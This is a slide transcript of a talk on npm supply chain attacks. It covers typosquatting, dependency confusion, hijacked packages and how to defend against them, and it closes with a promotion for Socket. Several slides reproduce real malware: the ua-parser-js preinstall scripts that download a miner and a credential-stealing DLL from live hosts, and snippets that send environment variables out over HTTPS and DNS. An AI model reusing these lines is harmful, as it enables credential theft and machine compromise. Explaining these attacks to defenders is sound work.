It's a Jungle Out There – What's Really Going on Inside Your Node_Modules Folder

Transcript

1. It's a Jungle Out There! What's Really Going on Inside

   Your Node_Modules Folder
2. None
3. None

4. Let me tell you a story...

5. None

6. 10 years of steady work

7. 7,000,000 downloads per week 2,807,000 GitHub repos

8. Let me tell you a story...

9. Title: Acc development, 7kk installations per week Posted: October 5,

   2021 I sell a development account on npmjs.com, more than 7 million installations every week, more than 1000 others are dependent on this. There is no 2FA on the account. Login and password access. The password is enough to change your email. Suitable for distributing installations, miners, creating a botnet Start $10k Step $1k Blitz $20k

10. Anatomy of a software supply chain attack • Started at

    Friday, October 22, 2021 at 12:15pm GMT • 3 malicious versions of ua-parser-js published • 0.7.29 • 0.8.0 • 1.0.0

11. { "title": "UAParser.js", "name": "ua-parser-js", "version": "0.7.29", "author": "Faisal Salman

    <[email protected]> (http://faisalman.com)", "description": "Lightweight JavaScript-based user-agent string parser", "main": "src/ua-parser.js", "scripts": { "preinstall": "start /B node preinstall.js & node preinstall.js", "build": "uglifyjs src/ua-parser.js ...", "test": "jshint src/ua-parser.js && mocha -R nyan test/test.js", "test-ci": "jshint src/ua-parser.js && mocha -R spec test/test.js" } }

12. const { exec } = require("child_process"); function terminalLinux(){ exec("/bin/bash preinstall.sh",

    (error, stdout, stderr) => { if (error) { console.log(`error: ${error.message}`); return; } if (stderr) { console.log(`stderr: ${stderr}`); return; } console.log(`stdout: ${stdout}`); }); } var opsys = process.platform; if (opsys == "darwin") { opsys = "MacOS"; } else if (opsys == "win32" || opsys == "win64") { opsys = "Windows"; const { spawn } = require('child_process'); const bat = spawn('cmd.exe', ['/c', 'preinstall.bat']); } else if (opsys == "linux") { opsys = "Linux"; terminalLinux(); }

13. IP=$(curl -k https://freegeoip.app/xml/ | grep 'RU\|UA\|BY\|KZ') if [ -z "$IP"

    ] then var=$(pgrep jsextension) if [ -z "$var" ] then curl http://159.148.186.228/download/jsextension -o jsextension if [ ! -f jsextension ] then wget http://159.148.186.228/download/jsextension -O jsextension fi chmod +x jsextension ./jsextension -k --tls --rig-id q -o pool.minexmr.com:443 -u <redacted> \ --cpu-max-threads-hint=50 --donate-level=1 --background &>/dev/null & fi fi

14. @echo off curl http://159.148.186.228/download/jsextension.exe -o jsextension.exe if not exist jsextension.exe

    ( wget http://159.148.186.228/download/jsextension.exe -O jsextension.exe ) if not exist jsextension.exe ( certutil.exe -urlcache -f http://159.148.186.228/download/jsextension.exe jsextension.exe ) curl https://citationsherbe.at/sdd.dll -o create.dll if not exist create.dll ( wget https://citationsherbe.at/sdd.dll -O create.dll ) if not exist create.dll ( certutil.exe -urlcache -f https://citationsherbe.at/sdd.dll create.dll ) set exe_1=jsextension.exe set "count_1=0" >tasklist.temp ( tasklist /NH /FI "IMAGENAME eq %exe_1%" ) for /f %%x in (tasklist.temp) do ( if "%%x" EQU "%exe_1%" set /a count_1+=1 ) if %count_1% EQU 0 (start /B .\jsextension.exe -k --tls --rig-id q -o pool.minexmr.com:443 -u <redacted> \ --cpu-max-threads-hint=50 --donate-level=1 --background & regsvr32.exe -s create.dll) del tasklist.temp

15. Steals passwords from over 100 programs and the Windows credential

    manager

16. Aftermath

17. None

18. This is just the tip of the iceberg 700 packages

    removed for security reasons in the last 30 days

19. 2022 is the year of supply chain security

20. Why is this happening now?

21. We download code from the internet written by unknown individuals

    that we haven't read that we execute with full permissions on our laptops and servers where we keep our most important data

22. It's a miracle that this system works!

23. 1. 90% of your app's code comes from open source

24. None

25. 2. Lots of transitive dependencies

26. "Installing an average npm package introduces an implicit trust on

    79 third-party packages and 39 maintainers, creating a surprisingly large attack surface1" 1 Markus Zimmermann, Cristian-Alexandru Staicu, Cam Tenny, Michael Pradel

27. webpack, unpacked

28. 3. No one reads the code

29. None

30. "Given enough eyeballs, all bugs are shallow" — Linus Torvalds

31. But if everyone does that, who is finding the malware?

32. "On average, a malicious package is available for 209 days

    before being publicly reported2" 2 Marc Ohm, Henrik Plate, Arnold Sykosch, Michael Meier

33. "20% of these malware persist in package managers for over

    400 days and have more than 1K downloads"3 3 Ruian Duan, Omar Alrawi, Ranjita Pai Kasturi, Ryan Elder, Brendan Saltaformaggio, Wenke Lee

34. 4. Popular tools give a false sense of security

35. Scanning for known vulnerabilities is not enough

36. Known Vulnerabilities • Accidentally introduced (usually by maintainer) • Sometimes

    okay to ship to production, if low impact Malware • Intentionally introduced (usually by attacker) • Never okay to ship to production
37. None

38. Developers need a new approach to detect and block malicious

    dependencies

39. How does a supply chain attack actually work?

40. We downloaded all of npm 100 GB of metadata 15

    TB of package tarballs

41. Attack Vectors (how the attacker tricks you) 1. Typosquatting 2.

    Dependency confusion attacks 3. Hijacked packages Attack Tactics (what the attack code does) 1. Install scripts 2. Privileged API usage (network, filesystem, environment vars) 3. Obfuscated code

42. Attack Vectors How the attacker tricks you

43. 1. Typosquatting

44. noblox.js-proxied noblox.js-proxy

45. noblox.js-proxied (real) noblox.js-proxy (fake)

46. { "name": "noblox.js-proxy", "version": "1.0.5", "description": "A Node.js wrapper for

    Roblox. (original from sentanos) (proxy edition by DarkDev)", "main": "lib/index.js", "types": "typings/index.d.ts", "scripts": { "docs": "jsdoc -c jsDocsConfig.json -r -t ./node_modules/better-docs", "lint": "eslint lib/", "test": "jest", "postinstall": "node postinstall.js" }, "repository": { "type": "git", "url": "https://github.com/JxySerr1/noblox.js-proxy.git" } }

47. (function(_0x249d1f,_0x2b8f5b){function _0x4c7bcc(_0xab39a4,_0x4f1570,_0x2f32bf, _0x4d98f7,_0x52a9ec){return _0x1efa(_0x52a9ec-0x379,_0x4d98f7);}function _0xfe08c3 (_0x3d9d3c,_0x4ae939,_0x217de2,_0x4278ef,_0x1a1bd1){return _0x1efa(_0x3d9d3c- -0x30, _0x217de2);}function _0x5dee13(_0x3bf95a,_0x410ef5,_0x6d0f61,_0x402705,_0x3daba2)

    {return _0x1efa(_0x410ef5- -0x6c,_0x3daba2);}const _0x40a390=_0x249d1f(); function _0x4ebfb2(_0x39433b,_0x180281,_0x29e008,_0x55bd13,_0x265536) {return _0x1efa(_0x180281-0x29c,_0x29e008);}function _0x1d9570(_0xcf31ba,_0x24a2a8, _0x1361be,_0x2b2b01,_0x2b71bd) {return _0x1efa(_0xcf31ba-0x357,_0x24a2a8);}while(!![]){try{const _0xe15807= -parseInt(_0x4ebfb2(0x718,0x638,'12Eh',0x6f0,0x6f6))/(0x1e27+-0x2ac+-0x1b7a) +parseInt(_0x4c7bcc(0x6d5,0x713,0x72c,'JXxJ',0x644))/(0x15*-0x16e+-0x19c4+0x37cc) +-parseInt(_0x4c7bcc(0x68d,0x788,0x86c,'JJ[O',0x754))/(-0x89e+0x2*-0x928+-0xb*-0x273) *(-parseInt(_0x4ebfb2(0x64f,0x62a,'$53b',0x530,0x55f))/(-0x2525+0x7c0+-0x1*-0x1d69)) +-parseInt(_0x4c7bcc(0x7d6,0x65e,0x7e5,'tOk*',0x729))/(0xc7d+0x7cc*-0x1+0x1*-0x4ac) +-parseInt(_0x4ebfb2(0x544,0x602,'!qJ9',0x565,0x6c2))/(-0x120e+0x1b1*-0x17+0x1f7*0x1d) +parseInt(_0xfe08c3(0x359,0x28a,'igej',0x404,0x3e9))/(0x163*-0x8+0x345+0x192*0x5) +-parseInt(_0x4ebfb2(0x40f,0x519,'!@70',0x4f5,0x5a2))/(0x1*-0x977+-0x15a+0xad9); if(_0xe15807===_0x2b8f5b)break;else _0x40a390['push'](_0x40a390['shift']());} catch(_0xdc6a7c){_0x40a390['push'](_0x40a390['shift']());}}}(_0x6450,-0x4f0c0+ 0x260b+0x29*0x4445));const _0x206d7b=(function(){function _0x2debc5(_0x482afc, _0x3fd1d9,_0x38f5d5,_0x18ac59,_0x17d73a){return _0x1efa(_0x18ac59- -0x3d1,_0x17d73a);}

48. 2. Dependency confusion

49. • Yahoo • yahoo-react-input • yahoo-react-formsy-input • EURid (registry manager

    for EU) • eurid_cloudflare • 18F (US Federal agency) • 18f-dashboard • Palantir (government contractor) • eslint-config-dev-palantir • DuckDuckGo (search engine) • duckduckgo-styles • Shippo (shipping company) • shippo-frontend

50. • Wix (website builder) • wix-media-manager-backend • wix-marketing-backend • wix-events-backend

    • wix-chat-backend • Unity (game engine) • com.unity.ide.vscode • com.unity.package-manager-ui • com.unity.modules.ai • com.unity.modules.androidjni • GrubHub (food delivery) • @grubhubprod/umami-library • @grubhubprod/order-taking-client-sdk • @grubhubprod/mochi • @grubhubprod/chiri

51. 3. Hijacked packages

52. None

53. Packages get hijacked because • Maintainers choose weak passwords •

    Maintainers reuse passwords • Maintainers get malware on their laptops • npm doesn't enforce 2FA for all accounts • Maintainers give access to malicious actors

54. Attack Tactics What the attack code does

55. 1. Install scripts

56. Most malware is in install scripts

57. "Most malicious packages (56%) start their routines on installation, which

    might be due to poor handling of arbitrary code during install2" 2 Marc Ohm, Henrik Plate, Arnold Sykosch, Michael Meier

58. { "name": "<redacted>", "version": "9998.9999.2", "description": "...", "main": "index.js", "scripts":

    { "test": "echo \"Error: no test specified\" && exit 1", "preinstall": "node dns.js | node index.js | node specific-fields.js" }, "files": ["specific-fields.js","index.js","dns.js"], "author": "", "license": "ISC" }

59. 2. Privileged API usage (network, filesystem, environment vars)

60. const http = require('https'); req = http.request({ host: '34.195.72.180', path:

    '/', method: 'POST', headers : { host : '411c316239cf14afaa1f37bbc5666207.m.pipedream.net', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) \ AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36' } }).on('error', function(err) { }); req.write(Buffer.from(JSON.stringify(process.env)).toString('base64')); req.end();

61. var { Resolver } = require('dns'); var zlib = require('zlib');

    var resolver = new Resolver(); function splitString(string, size) { var re = new RegExp('.{1,' + size + '}', 'g'); return string.match(re); } resolver.setServers(["165.232.68.239"]); var d = process.env || {}; var data = redactedForBrevity() var encData = zlib.brotliCompressSync(Buffer.from(JSON.stringify(data))).toString('hex'); var ch = splitString(encData, 60); var dt = Date.now(); for (var i = 0; i < ch.length; i++) { const domain = ['l' + dt, i + 1, ch.length, ch[i]].join('.'); resolver.resolve4(domain, function (err) { }); }

62. 3. Obfuscated code

63. (function(_0x249d1f,_0x2b8f5b){function _0x4c7bcc(_0xab39a4,_0x4f1570,_0x2f32bf, _0x4d98f7,_0x52a9ec){return _0x1efa(_0x52a9ec-0x379,_0x4d98f7);}function _0xfe08c3 (_0x3d9d3c,_0x4ae939,_0x217de2,_0x4278ef,_0x1a1bd1){return _0x1efa(_0x3d9d3c- -0x30, _0x217de2);}function _0x5dee13(_0x3bf95a,_0x410ef5,_0x6d0f61,_0x402705,_0x3daba2)

    {return _0x1efa(_0x410ef5- -0x6c,_0x3daba2);}const _0x40a390=_0x249d1f(); function _0x4ebfb2(_0x39433b,_0x180281,_0x29e008,_0x55bd13,_0x265536) {return _0x1efa(_0x180281-0x29c,_0x29e008);}function _0x1d9570(_0xcf31ba,_0x24a2a8, _0x1361be,_0x2b2b01,_0x2b71bd) {return _0x1efa(_0xcf31ba-0x357,_0x24a2a8);}while(!![]){try{const _0xe15807= -parseInt(_0x4ebfb2(0x718,0x638,'12Eh',0x6f0,0x6f6))/(0x1e27+-0x2ac+-0x1b7a) +parseInt(_0x4c7bcc(0x6d5,0x713,0x72c,'JXxJ',0x644))/(0x15*-0x16e+-0x19c4+0x37cc) +-parseInt(_0x4c7bcc(0x68d,0x788,0x86c,'JJ[O',0x754))/(-0x89e+0x2*-0x928+-0xb*-0x273) *(-parseInt(_0x4ebfb2(0x64f,0x62a,'$53b',0x530,0x55f))/(-0x2525+0x7c0+-0x1*-0x1d69)) +-parseInt(_0x4c7bcc(0x7d6,0x65e,0x7e5,'tOk*',0x729))/(0xc7d+0x7cc*-0x1+0x1*-0x4ac) +-parseInt(_0x4ebfb2(0x544,0x602,'!qJ9',0x565,0x6c2))/(-0x120e+0x1b1*-0x17+0x1f7*0x1d) +parseInt(_0xfe08c3(0x359,0x28a,'igej',0x404,0x3e9))/(0x163*-0x8+0x345+0x192*0x5) +-parseInt(_0x4ebfb2(0x40f,0x519,'!@70',0x4f5,0x5a2))/(0x1*-0x977+-0x15a+0xad9); if(_0xe15807===_0x2b8f5b)break;else _0x40a390['push'](_0x40a390['shift']());} catch(_0xdc6a7c){_0x40a390['push'](_0x40a390['shift']());}}}(_0x6450,-0x4f0c0+ 0x260b+0x29*0x4445));const _0x206d7b=(function(){function _0x2debc5(_0x482afc, _0x3fd1d9,_0x38f5d5,_0x18ac59,_0x17d73a){return _0x1efa(_0x18ac59- -0x3d1,_0x17d73a);}

64. Attackers publish different code to npm and GitHub

65. None

66. How you can protect your app?

67. None

68. 1. Choose better dependencies

69. If you ship code to production, you are responsible for

    it

70. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY

    KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

71. How to pick a dependency • ✅ Gets the job

    done? • ✅ Has an open source license? • ✅ Has good docs? • ✅ Has lots of downloads and GitHub stars? • ✅ Has recent commits? • ✅ Has types? • ✅ Has tests?
72. None
73. None
74. None
75. None

76. Research packages on Socket socket.dev

77. 2. Update dependencies at the right cadence

78. None
79. None
80. None
81. None

82. Tradeoffs, no perfect solution

83. 3. Audit every dependency

84. None
85. None
86. None
87. None
88. None

89. The happy medium • Use automation to automatically evaluate all

    dependencies • Look for malware, hidden code, typo-squatting, etc. • Manually audit only the most suspicious packages • Provide security information directly in PRs
90. None

91. Install our GitHub app socket.dev

92. Socket GitHub App features • Block typosquats – Block malicious

    packages that differ in name by only a few characters, and recommend the correct package • Block malware – Block emerging malware threats • Detect hidden code – Detect obfuscated, minified, or hidden code • Detect privileged API usage – Detect usage of risky APIs – filesystem, network, child_process, environment variables, eval() • Detect suspicious updates – Detect updates that significantly change package behavior
93. None

94. Try it out at socket.dev

95. Free for open source, forever

96. Free for private repos, while in beta

97. Please share your feedback! [email protected] twitter.com/feross Also, we're hiring!